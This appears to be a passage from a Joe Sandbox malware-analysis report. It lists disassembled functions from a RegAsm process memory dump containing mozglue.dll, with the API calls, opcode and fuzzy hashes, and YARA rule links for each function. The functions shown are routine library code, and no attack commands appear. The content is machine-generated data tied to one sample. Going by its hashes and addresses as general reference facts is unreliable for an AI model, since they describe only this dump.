                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
                                                                            • String ID: 0$z
                                                                            • API String ID: 310210123-2584888582
                                                                            • Opcode ID: 62c5bfb3ce3c1f6339342200d8de82d976632163274a50ef74e37e6af8f6e15a
                                                                            • Instruction ID: 74045c2f84009e951ddcc6ffd6cb30ab87bc731c806c9c0f1cdbaf8611a03efe
                                                                            • Opcode Fuzzy Hash: 62c5bfb3ce3c1f6339342200d8de82d976632163274a50ef74e37e6af8f6e15a
                                                                            • Instruction Fuzzy Hash: 774138719087469FC341DF69C480A8BBBE4BFC9354F409A2EF49987650EB30D549CF92
                                                                            Function 6CC378C0 Relevance: 12.3, APIs: 8, Instructions: 320COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • free.MOZGLUE(?,6CCB008B), ref: 6CC37B89
                                                                            • free.MOZGLUE(?,6CCB008B), ref: 6CC37BAC
                                                                              • Part of subcall function 6CC378C0: free.MOZGLUE(?,6CCB008B), ref: 6CC37BCF
                                                                            • free.MOZGLUE(?,6CCB008B), ref: 6CC37BF2
                                                                              • Part of subcall function 6CC55E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CC55EDB
                                                                              • Part of subcall function 6CC55E90: memset.VCRUNTIME140(6CC97765,000000E5,55CCCCCC), ref: 6CC55F27
                                                                              • Part of subcall function 6CC55E90: LeaveCriticalSection.KERNEL32(?), ref: 6CC55FB2
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: free$CriticalSection$EnterLeavememset
                                                                            • String ID:
                                                                            • API String ID: 3977402767-0
                                                                            • Opcode ID: d06a90c288bb6f93bfbe0784987deff49d495643f856a02ef4b03e2eb2266cf7
                                                                            • Instruction ID: 94fc221fc54e36b0e03f0871115498ac6b8cf9ea2f29b3b7a77180aeac3681d0
                                                                            • Opcode Fuzzy Hash: d06a90c288bb6f93bfbe0784987deff49d495643f856a02ef4b03e2eb2266cf7
                                                                            • Instruction Fuzzy Hash: DDC18071E01138CBEB248B28EE90B9DB772BF41318F1512E9D41EA7BC1E7319E859B51
                                                                            Function 6CC79420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6CC6AB89: EnterCriticalSection.KERNEL32(6CCBE370,?,?,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284), ref: 6CC6AB94
                                                                              • Part of subcall function 6CC6AB89: LeaveCriticalSection.KERNEL32(6CCBE370,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC6ABD1
                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                            Strings
                                                                            • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6CC79459
                                                                            • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6CC7946B
                                                                            • MOZ_BASE_PROFILER_LOGGING, xrefs: 6CC7947D
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
                                                                            • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
                                                                            • API String ID: 4042361484-1628757462
                                                                            • Opcode ID: 24a4c84fa9a339ab5e3b80b294ac612a864d47757d11aa5c1a6909d4d07a41d3
                                                                            • Instruction ID: 63acdb4d6b6662022c5f0db05e13659c80985077e483b14b10a7b90a70b1da63
                                                                            • Opcode Fuzzy Hash: 24a4c84fa9a339ab5e3b80b294ac612a864d47757d11aa5c1a6909d4d07a41d3
                                                                            • Instruction Fuzzy Hash: 2B01D478A001018BD7109BEDE915A4673B5EB46328F040536E90AA7F41F731E8658D6F
                                                                            Function 6CC81220 Relevance: 12.2, APIs: 8, Instructions: 173threadtimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC8124B
                                                                            • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC81268
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC812DA
                                                                            • InitializeConditionVariable.KERNEL32(?), ref: 6CC8134A
                                                                            • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6CC8138A
                                                                            • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6CC81431
                                                                              • Part of subcall function 6CC78AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6CC91563), ref: 6CC78BD5
                                                                            • free.MOZGLUE(?), ref: 6CC8145A
                                                                            • free.MOZGLUE(?), ref: 6CC8146C
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
                                                                            • String ID:
                                                                            • API String ID: 2803333873-0
                                                                            • Opcode ID: 4da3a71d347bd9a54141fd830d64bc9367bc66de7fe29be4739a2344bce3d8bc
                                                                            • Instruction ID: b4c9bb4e3925217e543ec6a7e7227bb0d51d6ed1f8726c7c28e82ca522ce602b
                                                                            • Opcode Fuzzy Hash: 4da3a71d347bd9a54141fd830d64bc9367bc66de7fe29be4739a2344bce3d8bc
                                                                            • Instruction Fuzzy Hash: F661AD75A053409BDB10CF29C880BABBBF5BFC5308F04891DE99A47A12EB30E459CB41
                                                                            Function 6CC80F40 Relevance: 12.2, APIs: 8, Instructions: 171threadtimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC80F6B
                                                                            • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC80F88
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC80FF7
                                                                            • InitializeConditionVariable.KERNEL32(?), ref: 6CC81067
                                                                            • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6CC810A7
                                                                            • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6CC8114B
                                                                              • Part of subcall function 6CC78AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6CC91563), ref: 6CC78BD5
                                                                            • free.MOZGLUE(?), ref: 6CC81174
                                                                            • free.MOZGLUE(?), ref: 6CC81186
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
                                                                            • String ID:
                                                                            • API String ID: 2803333873-0
                                                                            • Opcode ID: f810ba0a3f8ae8bbdafab63bcb787269c7c04e690e0794fdf3ed72608c7c8fe5
                                                                            • Instruction ID: 64f9b00a6d3357b35b803c6954f0ac9508f127866138a43e8a23e8d8222193c1
                                                                            • Opcode Fuzzy Hash: f810ba0a3f8ae8bbdafab63bcb787269c7c04e690e0794fdf3ed72608c7c8fe5
                                                                            • Instruction Fuzzy Hash: B361AD75A063409BDB10CF25C880B9BBBF6BFC5308F14891DE89987711EB71E949CB81
                                                                            Function 6CC3E9C0 Relevance: 12.1, APIs: 8, Instructions: 133COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • moz_xmalloc.MOZGLUE(?,?,?,6CC41999), ref: 6CC3EA39
                                                                            • memcpy.VCRUNTIME140(?,?,7FFFFFFE), ref: 6CC3EA5C
                                                                            • memset.VCRUNTIME140(7FFFFFFE,00000000,?), ref: 6CC3EA76
                                                                            • moz_xmalloc.MOZGLUE(-00000001,?,?,6CC41999), ref: 6CC3EA9D
                                                                            • memcpy.VCRUNTIME140(?,7FFFFFFE,?,?,?,6CC41999), ref: 6CC3EAC2
                                                                            • memset.VCRUNTIME140(?,00000000,00000000,?,?,?,?), ref: 6CC3EADC
                                                                            • free.MOZGLUE(7FFFFFFE,?,?,?,?), ref: 6CC3EB0B
                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?), ref: 6CC3EB27
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: memcpymemsetmoz_xmalloc$_invalid_parameter_noinfo_noreturnfree
                                                                            • String ID:
                                                                            • API String ID: 706364981-0
                                                                            • Opcode ID: 96ef0822f53e501e32504048c77324650007e9c4cdad27e8a0987a03a6821992
                                                                            • Instruction ID: b9313526c5eeeff951eeeb50a0357a6673782edaa038a4f8b279caa98240f4cf
                                                                            • Opcode Fuzzy Hash: 96ef0822f53e501e32504048c77324650007e9c4cdad27e8a0987a03a6821992
                                                                            • Instruction Fuzzy Hash: 594193B1A002269FDB14CFA8DC80AAE7BA4FF45358F240628E819D7794F731DD4587D5
                                                                            Function 6CC3B630 Relevance: 12.1, APIs: 8, Instructions: 128COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • moz_xmalloc.MOZGLUE(?,?,?,?,6CC3B61E,?,?,?,?,?,00000000), ref: 6CC3B6AC
                                                                              • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                            • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6CC3B61E,?,?,?,?,?,00000000), ref: 6CC3B6D1
                                                                            • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,6CC3B61E,?,?,?,?,?,00000000), ref: 6CC3B6E3
                                                                            • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6CC3B61E,?,?,?,?,?,00000000), ref: 6CC3B70B
                                                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,6CC3B61E,?,?,?,?,?,00000000), ref: 6CC3B71D
                                                                            • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,6CC3B61E), ref: 6CC3B73F
                                                                            • moz_xmalloc.MOZGLUE(80000023,?,?,?,6CC3B61E,?,?,?,?,?,00000000), ref: 6CC3B760
                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,6CC3B61E,?,?,?,?,?,00000000), ref: 6CC3B79A
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemalloc
                                                                            • String ID:
                                                                            • API String ID: 1394714614-0
                                                                            • Opcode ID: 51544dc9f21d85414a50ff5d69228bc5f52bae0b60e8556c42af2da1aae39e42
                                                                            • Instruction ID: 297e0ebdf178e551a262bbd8912b0ef863c13781515873c65bef4c66bd142892
                                                                            • Opcode Fuzzy Hash: 51544dc9f21d85414a50ff5d69228bc5f52bae0b60e8556c42af2da1aae39e42
                                                                            • Instruction Fuzzy Hash: 7941E3B2D005259FCB04DF68EC945AEB7B5FB45320F250629E829E7780F731A9048BE1
                                                                            Function 6CC3EF30 Relevance: 12.1, APIs: 8, Instructions: 128COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • moz_xmalloc.MOZGLUE(6CCB5104), ref: 6CC3EFAC
                                                                            • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6CC3EFD7
                                                                            • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CC3EFEC
                                                                            • free.MOZGLUE(?), ref: 6CC3F00C
                                                                            • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6CC3F02E
                                                                            • memcpy.VCRUNTIME140(00000000,?), ref: 6CC3F041
                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC3F065
                                                                            • moz_xmalloc.MOZGLUE ref: 6CC3F072
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfree
                                                                            • String ID:
                                                                            • API String ID: 1148890222-0
                                                                            • Opcode ID: 9425729af7d86e4f4a491fdbe31271777e00212789c18322d2fd1f8f387815f3
                                                                            • Instruction ID: e20aef7dbec717949eaf4c7e65986a924002eef227032a9315ff1c521ff2d74e
                                                                            • Opcode Fuzzy Hash: 9425729af7d86e4f4a491fdbe31271777e00212789c18322d2fd1f8f387815f3
                                                                            • Instruction Fuzzy Hash: 0041D9B1A001169FCB08CF68EC809AE7765FF88314B24466CE81AD7794FB75E915C7E1
                                                                            Function 6CCAB540 Relevance: 12.1, APIs: 8, Instructions: 93COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6CCAB5B9
                                                                            • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6CCAB5C5
                                                                            • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6CCAB5DA
                                                                            • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6CCAB5F4
                                                                            • __Init_thread_footer.LIBCMT ref: 6CCAB605
                                                                            • ?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6CCAB61F
                                                                            • std::_Facet_Register.LIBCPMT ref: 6CCAB631
                                                                            • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CCAB655
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
                                                                            • String ID:
                                                                            • API String ID: 1276798925-0
                                                                            • Opcode ID: d6fc7ce9e986f3d2a4060040e041f359518c70ffacd4c9817143981d748e8850
                                                                            • Instruction ID: 913224d398ae304cd8a06d744b8b942bfc86cdbe9b2fc2313d0dbbd9c068a89a
                                                                            • Opcode Fuzzy Hash: d6fc7ce9e986f3d2a4060040e041f359518c70ffacd4c9817143981d748e8850
                                                                            • Instruction Fuzzy Hash: 3531B379B00205CFCB00DFF9C8A89AEB7B5FF8A324B150599D90297740EB34A807CB95
                                                                            Function 6CC49830 Relevance: 10.7, APIs: 7, Instructions: 196COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • free.MOZGLUE(?,?,?,6CC97ABE), ref: 6CC4985B
                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,6CC97ABE), ref: 6CC498A8
                                                                            • moz_xmalloc.MOZGLUE(00000020), ref: 6CC49909
                                                                            • memcpy.VCRUNTIME140(00000023,?,?), ref: 6CC49918
                                                                            • free.MOZGLUE(?), ref: 6CC49975
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: free$_invalid_parameter_noinfo_noreturnmemcpymoz_xmalloc
                                                                            • String ID:
                                                                            • API String ID: 1281542009-0
                                                                            • Opcode ID: 0764e775a210bb2d539650b1298f21c246cbe7a57411dac5fa46b3089065f3c7
                                                                            • Instruction ID: 0abbb1056453f3e8e5dd87810baab3b36d638fe6d94386d0e887b349c37078c2
                                                                            • Opcode Fuzzy Hash: 0764e775a210bb2d539650b1298f21c246cbe7a57411dac5fa46b3089065f3c7
                                                                            • Instruction Fuzzy Hash: 6B719C746007158FC725CF28C580956B7F5FF4A324B248AADE85A8BBA0E771F845CB50
                                                                            Function 6CC4B790 Relevance: 10.6, APIs: 7, Instructions: 147COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6CC8CC83,?,?,?,?,?,?,?,?,?,6CC8BCAE,?,?,6CC7DC2C), ref: 6CC4B7E6
                                                                            • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6CC8CC83,?,?,?,?,?,?,?,?,?,6CC8BCAE,?,?,6CC7DC2C), ref: 6CC4B80C
                                                                            • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(?,00000000,?,6CC8CC83,?,?,?,?,?,?,?,?,?,6CC8BCAE), ref: 6CC4B88E
                                                                            • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(?,6CC8CC83,?,?,?,?,?,?,?,?,?,6CC8BCAE,?,?,6CC7DC2C), ref: 6CC4B896
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ?good@ios_base@std@@D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@Osfx@?$basic_ostream@
                                                                            • String ID:
                                                                            • API String ID: 922945588-0
                                                                            • Opcode ID: bcdd91ffc4d637c9301c608326139dc0e72ea955073c86225b9fe72161bbf8dc
                                                                            • Instruction ID: b38f9e6e4200ff579972aa192a45d391532718b6047f1fa906ce11a3bd42811f
                                                                            • Opcode Fuzzy Hash: bcdd91ffc4d637c9301c608326139dc0e72ea955073c86225b9fe72161bbf8dc
                                                                            • Instruction Fuzzy Hash: FF516B35700A048FDB25CF59C4A4A6EBBF5FF89318B69C95DE98A87351D731E802CB80
                                                                            Function 6CC74AD0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 139stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memcpy.VCRUNTIME140(00000000,?,?,80000000,?,6CC74AB7,?,6CC343CF,?,6CC342D2), ref: 6CC74B48
                                                                            • free.MOZGLUE(?,?,?,80000000,?,6CC74AB7,?,6CC343CF,?,6CC342D2), ref: 6CC74B7F
                                                                            • memcpy.VCRUNTIME140(00000000,?,?,80000000,?,6CC74AB7,?,6CC343CF,?,6CC342D2), ref: 6CC74B94
                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6CC74AB7,?,6CC343CF,?,6CC342D2), ref: 6CC74BBC
                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,pid:,00000004,?,?,?,6CC74AB7,?,6CC343CF,?,6CC342D2), ref: 6CC74BEE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$_invalid_parameter_noinfo_noreturnfreestrncmp
                                                                            • String ID: pid:
                                                                            • API String ID: 1916652239-3403741246
                                                                            • Opcode ID: 4c6f748d4c17a2816693ced801d03e63141d72772215ce4a619297c767d6a450
                                                                            • Instruction ID: 047abfd99efe7e5473bd4df71819a6d3811a8b05c3c5aa6068343f58295eaf49
                                                                            • Opcode Fuzzy Hash: 4c6f748d4c17a2816693ced801d03e63141d72772215ce4a619297c767d6a450
                                                                            • Instruction Fuzzy Hash: 8B41E671B002159BCB24CFB8DC8099FBBB9EF85224B144639E865D7781EB309908CBB5
                                                                            Function 6CC81D00 Relevance: 10.6, APIs: 7, Instructions: 115threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC81D0F
                                                                            • AcquireSRWLockExclusive.KERNEL32(?,?,6CC81BE3,?,?,6CC81D96,00000000), ref: 6CC81D18
                                                                            • ReleaseSRWLockExclusive.KERNEL32(?,?,6CC81BE3,?,?,6CC81D96,00000000), ref: 6CC81D4C
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC81DB7
                                                                            • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC81DC0
                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC81DDA
                                                                              • Part of subcall function 6CC81EF0: GetCurrentThreadId.KERNEL32 ref: 6CC81F03
                                                                              • Part of subcall function 6CC81EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6CC81DF2,00000000,00000000), ref: 6CC81F0C
                                                                              • Part of subcall function 6CC81EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6CC81F20
                                                                            • moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6CC81DF4
                                                                              • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
